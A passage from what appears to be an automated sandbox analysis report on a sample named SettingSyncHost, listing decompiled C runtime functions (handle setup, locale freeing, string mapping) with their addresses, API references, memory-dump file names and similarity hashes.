						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x10ee868 - _t93; // 0x0
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x10ee8c0[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x10ee8c4;
							while(1) {
								_t86 = E00F9A7FF(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x10ee868 =  *0x10ee868 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x10ee868 - _t93; // 0x0
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x10ee868; // 0x0
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x10ee8c0; // 0x0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}

0x00fa3169
0x00fa316f
0x00fa3173
0x00fa3174
0x00fa3175
0x00fa3180
0x00fa318a
0x00fa3190
0x00fa3195
0x00fa319b
0x00fa319d
0x00fa31d5
0x00fa31d7
0x00fa31db
0x00fa32ef
0x00fa32ef
0x00fa32ef
0x00fa32f1
0x00fa32f6
0x00fa32fc
0x00fa32fe
0x00fa3301
0x00fa330e
0x00fa330e
0x00fa3312
0x00fa3314
0x00fa331b
0x00fa3320
0x00fa3322
0x00fa3322
0x00fa3316
0x00fa3318
0x00fa3318
0x00fa332c
0x00fa332e
0x00fa3331
0x00fa3375
0x00fa3375
0x00fa3375
0x00fa3375
0x00fa3379
0x00000000
0x00fa3333
0x00fa3333
0x00fa3335
0x00000000
0x00000000
0x00fa3338
0x00fa333e
0x00fa3340
0x00000000
0x00000000
0x00fa3342
0x00fa3347
0x00fa3349
0x00fa334c
0x00fa3354
0x00fa3357
0x00fa3359
0x00fa3359
0x00fa3359
0x00fa3359
0x00fa334e
0x00fa334e
0x00fa334e
0x00fa3362
0x00fa3366
0x00fa336c
0x00fa336e
0x00fa339c
0x00fa339c
0x00fa3397
0x00000000
0x00fa3370
0x00fa3370
0x00000000
0x00fa3370
0x00fa336e
0x00fa3331
0x00fa3303
0x00fa3306
0x00000000
0x00000000
0x00fa3308
0x00fa337f
0x00fa337f
0x00fa3380
0x00fa3380
0x00fa338f
0x00fa3395
0x00fa3395
0x00000000
0x00fa3395
0x00fa31e1
0x00fa31e4
0x00fa31e6
0x00000000
0x00000000
0x00fa31ec
0x00fa31ee
0x00fa31f1
0x00fa31fb
0x00fa31fe
0x00fa3200
0x00fa3202
0x00fa3202
0x00fa3204
0x00fa320a
0x00fa3277
0x00fa3277
0x00fa3279
0x00fa327b
0x00000000
0x00000000
0x00000000
0x00000000
0x00fa327d
0x00fa327d
0x00fa3280
0x00fa3282
0x00fa3285
0x00000000
0x00000000
0x00fa3287
0x00fa328a
0x00000000
0x00000000
0x00fa328f
0x00fa3291
0x00fa3294
0x00000000
0x00000000
0x00fa3296
0x00fa3299
0x00fa32a6
0x00fa32b3
0x00fa32bf
0x00fa32c6
0x00fa32ce
0x00fa32d2
0x00fa32d8
0x00fa32da
0x00000000
0x00000000
0x00fa32e0
0x00fa32e0
0x00fa32e0
0x00000000
0x00fa32e0
0x00fa329c
0x00fa32a2
0x00fa32a4
0x00000000
0x00000000
0x00000000
0x00fa32e3
0x00fa32e3
0x00fa32e7
0x00fa32e8
0x00fa32eb
0x00fa32eb
0x00000000
0x00fa320c
0x00fa320c
0x00fa3211
0x00fa3215
0x00fa321c
0x00fa321e
0x00000000
0x00000000
0x00fa3220
0x00fa3227
0x00fa322d
0x00fa322f
0x00fa3231
0x00fa3264
0x00fa3264
0x00fa3267
0x00fa326d
0x00000000
0x00000000
0x00000000
0x00fa326f
0x00fa3233
0x00fa3233
0x00fa3236
0x00fa3236
0x00fa323a
0x00fa323e
0x00fa3242
0x00fa3246
0x00fa324c
0x00fa3252
0x00fa3258
0x00fa325d
0x00fa3260
0x00fa3260
0x00000000
0x00fa3236
0x00fa3271
0x00000000
0x00fa3271
0x00fa320a
0x00fa319f
0x00fa319f
0x00fa31a2
0x00fa31a2
0x00fa31a6
0x00fa31ac
0x00fa31af
0x00fa31b5
0x00fa31b9
0x00fa31bc
0x00fa31bf
0x00fa31c5
0x00fa31c8
0x00fa31d1
0x00fa31d1
0x00000000
0x00fa31a2
0x00000000

APIs

GetStartupInfoW.KERNEL32(?), ref: 00FA3169
__calloc_crt.LIBCMT ref: 00FA3175

Part of subcall function 00F9A7FF: Sleep.KERNEL32(00000000), ref: 00F9A827

__calloc_crt.LIBCMT ref: 00FA3215
GetFileType.KERNEL32(?), ref: 00FA329C

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: __calloc_crt$FileInfoSleepStartupType
String ID:
API String ID: 591920814-0
Opcode ID: f1b2f239fe1d6f72a9b61ced3805fa69e7cc63f6a9990db9a39287f064e6a8f7
Instruction ID: d9c21bbed492b122c0a018c19b8bf9fd64ba00fd755b527e9a2dabd51463c973
Opcode Fuzzy Hash: f1b2f239fe1d6f72a9b61ced3805fa69e7cc63f6a9990db9a39287f064e6a8f7
Instruction Fuzzy Hash: 1D6128B2D043058FDB20CB69C889B197BE4AF07730F284668F5A6CB2D5DB35EA41E745

Uniqueness

Uniqueness Score: -1.00%

Function 00FD0030, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD0079
std::_Lockit::_Lockit.LIBCPMT ref: 00FD009B
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD00BB
__Getctype.LIBCPMT ref: 00FD0151
std::_Facet_Register.LIBCPMT ref: 00FD0170
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD0188

Strings

xT, xrefs: 00FD008B, 00FD017F

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: xT
API String ID: 1102183713-1071394365
Opcode ID: c98b76682ef1023b3a9877b6ed3096ac0d812f721159d5b3c0ae9d7e1846eb93
Instruction ID: b4523e0932145cb3a30f9ad2fb0274fef0783a2dbc65d8a6429afc9a648e5f1a
Opcode Fuzzy Hash: c98b76682ef1023b3a9877b6ed3096ac0d812f721159d5b3c0ae9d7e1846eb93
Instruction Fuzzy Hash: 63419E71E04208DFCB21DF54D841BAEB7B5EF04720F18816EE845AB381DB79AD45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2D63, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5A10: GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
Part of subcall function 00FE5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

_free.LIBCMT ref: 00FE304E
_free.LIBCMT ref: 00FE3067
_free.LIBCMT ref: 00FE30A5
_free.LIBCMT ref: 00FE30AE
_free.LIBCMT ref: 00FE30BA

Strings

C, xrefs: 00FE2EBF

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 42815d1213ddd0880ae57e0ddd2b5b0d71cecc15a86bd970ebe0a1a97df08857
Instruction ID: 90f8063d2b310b60f00203721ab3e6b6ef82d0b0b8422187a15462af964a266c
Opcode Fuzzy Hash: 42815d1213ddd0880ae57e0ddd2b5b0d71cecc15a86bd970ebe0a1a97df08857
Instruction Fuzzy Hash: 19B18B75E012699FDB64DF19CC88AADB3B5FF48314F1045AAE90AA7350E731AE90DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8CC2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00FE8D2D
api-ms-, xrefs: 00FE8D19

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: a7350bc538ad536c93965cbc4546e0af5aeb8350757ad7aef51ec381a98b304a
Instruction ID: f719da1ca70767da4f544b11dfd2a486bdc3a6a03f6830563fff9d9c0018e60a
Opcode Fuzzy Hash: a7350bc538ad536c93965cbc4546e0af5aeb8350757ad7aef51ec381a98b304a
Instruction Fuzzy Hash: A821AB72E01695ABCB316B669C44B2B37689F117F0F250511ED09A72D1DE70DD02F6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00FECE7C, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FECBC8: _free.LIBCMT ref: 00FECBED

_free.LIBCMT ref: 00FECECA

Part of subcall function 00FE5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7), ref: 00FE5CD5
Part of subcall function 00FE5CBF: GetLastError.KERNEL32(00FCB0A7,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7,00FCB0A7), ref: 00FE5CE7

_free.LIBCMT ref: 00FECED5
_free.LIBCMT ref: 00FECEE0
_free.LIBCMT ref: 00FECF34
_free.LIBCMT ref: 00FECF3F
_free.LIBCMT ref: 00FECF4A
_free.LIBCMT ref: 00FECF55

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 170cdc25c2c107f089e5fe9c92c420492c2528102a38fb1041c96f72bd0f2f2d
Instruction ID: 02d9346b68cc30f328b4e36a6548b6c163b51595c03d1141211acbc7229d79e6
Opcode Fuzzy Hash: 170cdc25c2c107f089e5fe9c92c420492c2528102a38fb1041c96f72bd0f2f2d
Instruction Fuzzy Hash: 9A11B672541B94BAD670BBB2CC07FCB779C5F44700F400C14F39A66192DA3EB5066791

Uniqueness

Uniqueness Score: -1.00%

Function 00F93DCC, Relevance: 10.6, APIs: 7, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F93DCC(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
				signed int _v8;
				void* _t10;
				LONG* _t13;
				LONG* _t18;
				LONG** _t33;

				_t31 = __edi;
				_t24 = __ebx;
				_push(8);
				_push(0xfc5d30);
				_t10 = E00F9A560(__ebx, __edi, __esi);
				_t33 = _a4;
				if(_t33 != 0) {
					E00F99DC7(__ebx, __edi, 0xd);
					_v8 = _v8 & 0x00000000;
					_t13 = _t33[1];
					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
						_t22 = _t33[1];
						if(_t33[1] != 0xfc7600) {
							E00F99DFA(_t22);
						}
					}
					_v8 = 0xfffffffe;
					E00F93DB7();
					if( *_t33 != 0) {
						E00F99DC7(_t24, _t31, 0xc);
						_v8 = 1;
						E00F99323( *_t33);
						_t18 =  *_t33;
						if(_t18 != 0 &&  *_t18 == 0 && _t18 != 0xfc7210) {
							E00F993BC(_t18);
						}
						_v8 = 0xfffffffe;
						E00F93DC3();
					}
					 *_t33 = 0xbaadf00d;
					_t33[1] = 0xbaadf00d;
					_t10 = E00F99DFA(_t33);
				}
				return E00F9A5A5(_t10);
			}

0x00f93dcc
0x00f93dcc
0x00f93d0a
0x00f93d0c
0x00f93d11
0x00f93d16
0x00f93d1b
0x00f93d23
0x00f93d29
0x00f93d2d
0x00f93d32
0x00f93d3f
0x00f93d47
0x00f93d4a
0x00f93d4f
0x00f93d47
0x00f93d50
0x00f93d57
0x00f93d5f
0x00f93d63
0x00f93d69
0x00f93d72
0x00f93d78
0x00f93d7c
0x00f93d8b
0x00f93d90
0x00f93d91
0x00f93d98
0x00f93d98
0x00f93da2
0x00f93da4
0x00f93da8
0x00f93dad
0x00f93db3

APIs

__lock.LIBCMT ref: 00F93D23

Part of subcall function 00F99DC7: __mtinitlocknum.LIBCMT ref: 00F99DDD
Part of subcall function 00F99DC7: __amsg_exit.LIBCMT ref: 00F99DE9
Part of subcall function 00F99DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,00F997EE,0000000D), ref: 00F99DF1

InterlockedDecrement.KERNEL32(00000000), ref: 00F93D35
_free.LIBCMT ref: 00F93D4A

Part of subcall function 00F99DFA: HeapFree.KERNEL32(00000000,00000000,?,00F998C2,00000000), ref: 00F99E10
Part of subcall function 00F99DFA: GetLastError.KERNEL32(00000000,?,00F998C2,00000000), ref: 00F99E22

__lock.LIBCMT ref: 00F93D63
___removelocaleref.LIBCMT ref: 00F93D72
___freetlocinfo.LIBCMT ref: 00F93D8B
_free.LIBCMT ref: 00F93DA8

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 556454624-0
Opcode ID: ed81727808a1c30e3284ecb66e7272e7a13246bd34f1502489c09dd345077c4f
Instruction ID: fde64df1bfadd553c18077c9d3e16a48e84534e30b044666b534a419661c6752
Opcode Fuzzy Hash: ed81727808a1c30e3284ecb66e7272e7a13246bd34f1502489c09dd345077c4f
Instruction Fuzzy Hash: 14119E31A053089AFF30AF68884AB5E73A4AF00720F25040EF4D8971D5DB79DA80BA91

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA90E, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00FDA957
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00FDA9C2
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDA9DF
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00FDAA1E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDAA7D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FDAAA0

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 704e770d0c0b0e78d3b58e9bd5820c8042caddb07d327d4d85f5a219d38c782b
Instruction ID: 79a0b6b2b7a31bf51ed533a3d5602cb2f7abedee291ab4858ce7b94be8549334
Opcode Fuzzy Hash: 704e770d0c0b0e78d3b58e9bd5820c8042caddb07d327d4d85f5a219d38c782b
Instruction Fuzzy Hash: C851C77290020AEFDF209F50CD41FBB7BAAEF44750F194626F905D6250E7788D11EB56

Uniqueness

Uniqueness Score: -1.00%

Function 00F9A057, Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00F9A057(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xfc5ee8);
				E00F9A560(__ebx, __edi, __esi);
				_t31 = E00F998D1(__ebx, __edx, _t35);
				_t15 =  *0xfc72f4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00F99DC7(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xfc7a28; // 0xfc7600
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xfc7600;
								if(__eflags != 0) {
									E00F99DFA(_t33);
								}
							}
						}
						_t21 =  *0xfc7a28; // 0xfc7600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xfc7a28; // 0xfc7600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00F9A0F2();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00FA235F(_t29, _t38, 0x20);
				}
				return E00F9A5A5(_t33);
			}

0x00f9a057
0x00f9a057
0x00f9a057
0x00f9a057
0x00f9a059
0x00f9a05e
0x00f9a068
0x00f9a06a
0x00f9a072
0x00f9a093
0x00f9a099
0x00f9a09d
0x00f9a0a0
0x00f9a0a3
0x00f9a0a9
0x00f9a0ab
0x00f9a0ad
0x00f9a0b6
0x00f9a0b8
0x00f9a0ba
0x00f9a0c0
0x00f9a0c3
0x00f9a0c8
0x00f9a0c0
0x00f9a0b8
0x00f9a0c9
0x00f9a0ce
0x00f9a0d1
0x00f9a0d7
0x00f9a0db
0x00f9a0db
0x00f9a0e1
0x00f9a0e8
0x00f9a07a
0x00f9a07a
0x00f9a07a
0x00f9a07d
0x00f9a07f
0x00f9a083
0x00f9a088
0x00f9a090

APIs

__getptd.LIBCMT ref: 00F9A063

Part of subcall function 00F998D1: __getptd_noexit.LIBCMT ref: 00F998D4
Part of subcall function 00F998D1: __amsg_exit.LIBCMT ref: 00F998E1

__amsg_exit.LIBCMT ref: 00F9A083
__lock.LIBCMT ref: 00F9A093
InterlockedDecrement.KERNEL32(?), ref: 00F9A0B0
_free.LIBCMT ref: 00F9A0C3
InterlockedIncrement.KERNEL32(00FC7600), ref: 00F9A0DB

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 5763bd542ae31d91bea3553dc82fd5aeab4a7cf84229297a4c95964cbf9935b9
Instruction ID: 5e284b7ed1c951fbde5dfb88794087fcf767d69552788690f7525d2022fbbec5
Opcode Fuzzy Hash: 5763bd542ae31d91bea3553dc82fd5aeab4a7cf84229297a4c95964cbf9935b9
Instruction Fuzzy Hash: 3F01C032E04B219BFF25AB298C06B5D73A0BF05730F050009F844632A5C7786981FFD6

Uniqueness

Uniqueness Score: -1.00%

Function 00FE109C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00FE1091,?,?,00FE1059,?,?,?), ref: 00FE10B1
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FE10C4
FreeLibrary.KERNEL32(00000000,?,?,00FE1091,?,?,00FE1059,?,?,?), ref: 00FE10E7

Strings

mscoree.dll, xrefs: 00FE10AA
CorExitProcess, xrefs: 00FE10BC

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
